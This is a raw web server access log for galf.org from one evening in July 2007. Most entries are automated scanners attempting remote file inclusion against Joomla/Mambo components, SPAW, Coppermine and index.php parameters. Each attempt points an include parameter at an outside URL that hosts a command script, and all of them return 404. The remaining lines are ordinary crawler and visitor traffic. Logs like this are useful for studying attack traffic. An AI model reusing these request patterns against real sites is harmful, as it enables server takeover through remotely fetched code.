194.146.227.87 - - [29/Jul/2007:17:22:06 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://jkjk.site.voila.fr/CMD.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
194.146.227.87 - - [29/Jul/2007:17:22:06 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://jkjk.site.voila.fr/CMD.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.38.50.26 - - [29/Jul/2007:17:24:07 -0700] "GET /logs/header.php?tpl_pgb_moddir=http://anadiclaguna.com.mx/components/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.38.50.26 - - [29/Jul/2007:17:24:08 -0700] "GET /header.php?tpl_pgb_moddir=http://anadiclaguna.com.mx/components/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.38.50.26 - - [29/Jul/2007:17:28:39 -0700] "GET /logs/access.log/header.php?tpl_pgb_moddir=http://anadiclaguna.com.mx/components/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
64.38.50.26 - - [29/Jul/2007:17:28:41 -0700] "GET /logs/access_070716.log/header.php?tpl_pgb_moddir=http://anadiclaguna.com.mx/components/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
85.17.3.183 - - [29/Jul/2007:17:29:12 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
85.17.3.183 - - [29/Jul/2007:17:29:12 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.6.19.80 - - [29/Jul/2007:17:59:50 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.6.25.102 - - [29/Jul/2007:17:59:50 -0700] "GET /tmp/?N=D HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
216.242.44.64 - - [29/Jul/2007:18:01:41 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.auktion-tauschangebote.de/counter/f75f403fcc9b0507dd03ec5395ad3e6b.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.242.44.64 - - [29/Jul/2007:18:01:41 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.auktion-tauschangebote.de/counter/f75f403fcc9b0507dd03ec5395ad3e6b.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.75.55.25 - - [29/Jul/2007:18:01:47 -0700] "GET /index2.php?url_page=http://www.darkattack.xpg.com.br/Owner/scan/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.75.55.25 - - [29/Jul/2007:18:02:10 -0700] "GET /logs/index2.php?url_page=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.75.55.25 - - [29/Jul/2007:18:02:10 -0700] "GET /index2.php?url_page=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.75.55.25 - - [29/Jul/2007:18:02:12 -0700] "GET /logs/access.log/index2.php?url_page=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.75.55.25 - - [29/Jul/2007:18:02:12 -0700] "GET /logs/access_070716.log/index2.php?url_page=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.30.177.240 - - [29/Jul/2007:18:05:06 -0700] "GET /logs/access_070430.log HTTP/1.0" 200 225841 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
194.146.227.87 - - [29/Jul/2007:18:05:07 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://jkjk.site.voila.fr/CMD.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
194.146.227.87 - - [29/Jul/2007:18:05:07 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://jkjk.site.voila.fr/CMD.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.214.29.115 - - [29/Jul/2007:18:05:30 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.mybtsa.com/admin/,/CMD.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
85.214.29.115 - - [29/Jul/2007:18:05:30 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.mybtsa.com/admin/,/CMD.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.17.3.183 - - [29/Jul/2007:18:05:39 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
85.17.3.183 - - [29/Jul/2007:18:05:39 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.194.6.70 - - [29/Jul/2007:18:06:15 -0700] "GET / HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312460)" "www.galf.org"
213.92.110.110 - - [29/Jul/2007:18:06:16 -0700] "GET /logs/index.php?pagina=http://broilerassociation.or.th/modules/editor/popups/save_images/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
213.92.110.110 - - [29/Jul/2007:18:06:16 -0700] "GET /index.php?pagina=http://broilerassociation.or.th/modules/editor/popups/save_images/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
216.75.55.25 - - [29/Jul/2007:18:07:10 -0700] "GET /logs/access_070716.log/index1.php?dat=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
216.75.55.25 - - [29/Jul/2007:18:07:10 -0700] "GET /index1.php?dat=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.75.55.25 - - [29/Jul/2007:18:07:10 -0700] "GET /logs/index1.php?dat=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
85.17.3.183 - - [29/Jul/2007:18:08:33 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
85.17.3.183 - - [29/Jul/2007:18:08:33 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
89.110.144.243 - - [29/Jul/2007:18:10:08 -0700] "GET /logs/index.php?pagina=http://broilerassociation.or.th/modules/editor/popups/save_images/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
89.110.144.243 - - [29/Jul/2007:18:10:08 -0700] "GET /index.php?pagina=http://broilerassociation.or.th/modules/editor/popups/save_images/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.6.71.170 - - [29/Jul/2007:18:16:00 -0700] "GET /labia/?D=A HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
89.110.144.243 - - [29/Jul/2007:18:16:20 -0700] "GET /logs/index.php?open=http://broilerassociation.or.th/modules/editor/popups/save_images/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
89.110.144.243 - - [29/Jul/2007:18:16:20 -0700] "GET /index.php?open=http://broilerassociation.or.th/modules/editor/popups/save_images/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
89.108.66.169 - - [29/Jul/2007:18:17:54 -0700] "GET /logs/index.php?x=http://www.l1nuxgroup.by.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
89.108.66.169 - - [29/Jul/2007:18:17:54 -0700] "GET /index.php?x=http://www.l1nuxgroup.by.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.6.17.159 - - [29/Jul/2007:18:21:33 -0700] "GET /labia/ HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
82.197.130.21 - - [29/Jul/2007:18:24:09 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://broilerassociation.or.th/modules/editor/popups/save_images/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
82.197.130.21 - - [29/Jul/2007:18:24:10 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://broilerassociation.or.th/modules/editor/popups/save_images/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
64.72.112.110 - - [29/Jul/2007:18:25:05 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
64.72.112.110 - - [29/Jul/2007:18:25:05 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800"
74.6.24.34 - - [29/Jul/2007:18:28:25 -0700] "GET /logs/?D=D HTTP/1.0" 200 4926 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
85.214.64.202 - - [29/Jul/2007:18:30:39 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.64.202 - - [29/Jul/2007:18:30:40 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.6.17.44 - - [29/Jul/2007:18:30:51 -0700] "GET /logs/ HTTP/1.0" 200 4926 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
208.3.90.203 - - [29/Jul/2007:18:33:03 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://broilerassociation.or.th/modules/editor/popups/save_images/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.3.90.203 - - [29/Jul/2007:18:33:03 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://broilerassociation.or.th/modules/editor/popups/save_images/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
122.152.140.206 - - [29/Jul/2007:18:33:16 -0700] "GET / HTTP/1.1" 200 1048 "-" "Baiduspider+(+http://www.baidu.com/search/spider_jp.html)" "www.galf.org"
59.35.126.202 - - [29/Jul/2007:18:33:28 -0700] "GET / HTTP/1.1" 200 1048 "http://search.yahoo.com/search?p=%22index%20of%20%2F%22%20labia&ei=UTF-8" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GreenBrowser)" "www.galf.org"
59.35.126.202 - - [29/Jul/2007:18:33:30 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "GreenBrowser" "www.galf.org"
59.35.126.202 - - [29/Jul/2007:18:33:32 -0700] "GET /labia/ HTTP/1.1" 200 524 "http://www.galf.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GreenBrowser)" "www.galf.org"
190.40.226.214 - - [29/Jul/2007:18:34:17 -0700] "GET / HTTP/1.1" 200 1048 "http://www.runa.org.pe/divsexual/enlaces.htm" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
85.214.64.202 - - [29/Jul/2007:18:42:34 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
85.214.64.202 - - [29/Jul/2007:18:42:34 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.134.95.19 - - [29/Jul/2007:18:47:57 -0700] "GET /logs/access_070611.log HTTP/1.1" 200 443571 "http://www.google.de/search?hl=de&ie=ISO-8859-1&q=193.164.133.203&btnG=Google-Suche&meta=" "Charon/1.x (Amiga)" "www.galf.org"
80.134.95.19 - - [29/Jul/2007:18:47:58 -0700] "GET / HTTP/1.1" 200 1048 "-" "Charon/1.x (Amiga)" "www.galf.org"
80.134.95.19 - - [29/Jul/2007:18:47:59 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Charon/1.x (Amiga)" "www.galf.org"
80.134.95.19 - - [29/Jul/2007:18:48:06 -0700] "GET /cendoc/ HTTP/1.1" 200 526 "http://www.galf.org/" "Charon/1.x (Amiga)" "www.galf.org"
80.134.95.19 - - [29/Jul/2007:18:48:06 -0700] "GET /labia/ HTTP/1.1" 200 524 "http://www.galf.org/" "Charon/1.x (Amiga)" "www.galf.org"
80.134.95.19 - - [29/Jul/2007:18:48:07 -0700] "GET /logs/ HTTP/1.1" 200 4942 "http://www.galf.org/" "Charon/1.x (Amiga)" "www.galf.org"
80.134.95.19 - - [29/Jul/2007:18:48:07 -0700] "GET /tmp/ HTTP/1.1" 200 520 "http://www.galf.org/" "Charon/1.x (Amiga)" "www.galf.org"
80.134.95.19 - - [29/Jul/2007:18:48:11 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Charon/1.x (Amiga)" "www.galf.org"
74.6.24.220 - - [29/Jul/2007:18:49:55 -0700] "GET /tmp/?M=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.6.19.171 - - [29/Jul/2007:18:51:15 -0700] "GET / HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
89.110.144.243 - - [29/Jul/2007:18:55:09 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://broilerassociation.or.th/modules/editor/popups/save_images/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
89.110.144.243 - - [29/Jul/2007:18:55:10 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://broilerassociation.or.th/modules/editor/popups/save_images/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.10.195.217 - - [29/Jul/2007:18:55:32 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.garotym123.kit.net/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.10.195.217 - - [29/Jul/2007:18:55:32 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.garotym123.kit.net/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
76.209.77.166 - - [29/Jul/2007:18:55:51 -0700] "GET /logs/modules/coppermine/themes/default/theme.php?THEME_DIR=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
76.209.77.166 - - [29/Jul/2007:18:55:51 -0700] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.173.72.3 - - [29/Jul/2007:18:59:15 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://broilerassociation.or.th/modules/editor/popups/save_images/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.173.72.3 - - [29/Jul/2007:18:59:15 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://broilerassociation.or.th/modules/editor/popups/save_images/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.89.227.61 - - [29/Jul/2007:19:00:13 -0700] "GET /logs/access_070728.log HTTP/1.0" 404 275 "-" "Wget/1.10.2" "galf.org"
83.21.122.224 - - [29/Jul/2007:19:03:50 -0700] "GET /logs/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://members.lycos.co.uk/kalafi0r/asd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.21.122.224 - - [29/Jul/2007:19:03:51 -0700] "GET /include/inc_ext/spaw/dialogs/table.php?spaw_root=http://members.lycos.co.uk/kalafi0r/asd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
190.54.62.68 - - [29/Jul/2007:19:06:23 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://jkjk.site.voila.fr/CMD.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
190.54.62.68 - - [29/Jul/2007:19:06:24 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://jkjk.site.voila.fr/CMD.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.173.72.3 - - [29/Jul/2007:19:11:01 -0700] "GET /logs/index.php?open=http://broilerassociation.or.th/modules/editor/popups/save_images/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.173.72.3 - - [29/Jul/2007:19:11:01 -0700] "GET /index.php?open=http://broilerassociation.or.th/modules/editor/popups/save_images/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
65.90.251.179 - - [29/Jul/2007:19:14:05 -0700] "GET /logs/index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
65.90.251.179 - - [29/Jul/2007:19:14:05 -0700] "GET /index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
74.6.25.200 - - [29/Jul/2007:19:18:36 -0700] "GET /?S=A HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
89.106.79.20 - - [29/Jul/2007:19:19:38 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
89.106.79.20 - - [29/Jul/2007:19:19:38 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.21.122.224 - - [29/Jul/2007:19:20:13 -0700] "GET /logs/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://members.lycos.co.uk/kalafi0r/asd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.21.122.224 - - [29/Jul/2007:19:20:15 -0700] "GET /include/inc_ext/spaw/dialogs/table.php?spaw_root=http://members.lycos.co.uk/kalafi0r/asd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.208.65 - - [29/Jul/2007:19:20:54 -0700] "GET /logs/index.php?inc=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
212.241.208.65 - - [29/Jul/2007:19:20:54 -0700] "GET /index.php?inc=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
212.90.212.33 - - [29/Jul/2007:19:20:55 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.cadisass.it/images/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
212.90.212.33 - - [29/Jul/2007:19:20:55 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.cadisass.it/images/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
74.6.28.220 - - [29/Jul/2007:19:21:48 -0700] "GET /cendoc/ HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
65.90.251.179 - - [29/Jul/2007:19:31:23 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
65.90.251.179 - - [29/Jul/2007:19:31:24 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
216.242.44.64 - - [29/Jul/2007:19:32:19 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.auktion-tauschangebote.de/counter/f75f403fcc9b0507dd03ec5395ad3e6b.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.242.44.64 - - [29/Jul/2007:19:32:19 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.auktion-tauschangebote.de/counter/f75f403fcc9b0507dd03ec5395ad3e6b.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
190.54.62.68 - - [29/Jul/2007:19:32:33 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://jkjk.site.voila.fr/CMD.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
190.54.62.68 - - [29/Jul/2007:19:32:33 -0700] "GET /modules/My_eGallery/index.php?basepath=http://jkjk.site.voila.fr/CMD.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
208.3.90.203 - - [29/Jul/2007:19:32:43 -0700] "GET /index.php?open=http://broilerassociation.or.th/modules/editor/popups/save_images/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.19.128.27 - - [29/Jul/2007:19:33:39 -0700] "GET /logs/index.php?inc=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
213.19.128.27 - - [29/Jul/2007:19:33:40 -0700] "GET /index.php?inc=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
89.110.144.243 - - [29/Jul/2007:19:35:54 -0700] "GET /logs/index.php?x=http://broilerassociation.or.th/modules/editor/popups/save_images/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
89.110.144.243 - - [29/Jul/2007:19:35:55 -0700] "GET /index.php?x=http://broilerassociation.or.th/modules/editor/popups/save_images/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
130.15.24.222 - - [29/Jul/2007:19:37:31 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
130.15.24.222 - - [29/Jul/2007:19:37:32 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
83.223.100.132 - - [29/Jul/2007:19:41:46 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.freewebtown.com/m3ks/bot/hajar1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.223.100.132 - - [29/Jul/2007:19:41:46 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.freewebtown.com/m3ks/bot/hajar1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
80.120.19.95 - - [29/Jul/2007:19:44:36 -0700] "GET /logs/index.php?open=http://chanartemide.altervista.org/forum/language/lang_english/email/.../.../.../zip.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.120.19.95 - - [29/Jul/2007:19:44:38 -0700] "GET /index.php?open=http://chanartemide.altervista.org/forum/language/lang_english/email/.../.../.../zip.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.232.122.224 - - [29/Jul/2007:19:45:10 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://cromonimster.com/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.806"
72.232.122.224 - - [29/Jul/2007:19:45:10 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://cromonimster.com/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.806"
66.111.59.150 - - [29/Jul/2007:19:45:23 -0700] "GET /logs//admin/editor2/spaw_control.class.php?spaw_root=http://www.phoenixinstitut.at/phoenix/includes/nn? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
66.111.59.150 - - [29/Jul/2007:19:45:23 -0700] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://www.phoenixinstitut.at/phoenix/includes/nn? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
85.17.3.183 - - [29/Jul/2007:19:46:22 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
85.17.3.183 - - [29/Jul/2007:19:46:22 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
85.17.3.183 - - [29/Jul/2007:19:46:54 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
85.17.3.183 - - [29/Jul/2007:19:46:55 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
85.17.3.183 - - [29/Jul/2007:19:49:37 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
85.17.3.183 - - [29/Jul/2007:19:49:37 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
85.17.3.183 - - [29/Jul/2007:19:49:55 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
85.17.3.183 - - [29/Jul/2007:19:49:55 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.111.59.150 - - [29/Jul/2007:19:50:08 -0700] "GET /logs/access.log//admin/editor2/spaw_control.class.php?spaw_root=http://www.phoenixinstitut.at/phoenix/includes/nn? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
213.173.72.3 - - [29/Jul/2007:19:51:47 -0700] "GET /logs/index.php?x=http://broilerassociation.or.th/modules/editor/popups/save_images/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.173.72.3 - - [29/Jul/2007:19:51:47 -0700] "GET /index.php?x=http://broilerassociation.or.th/modules/editor/popups/save_images/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
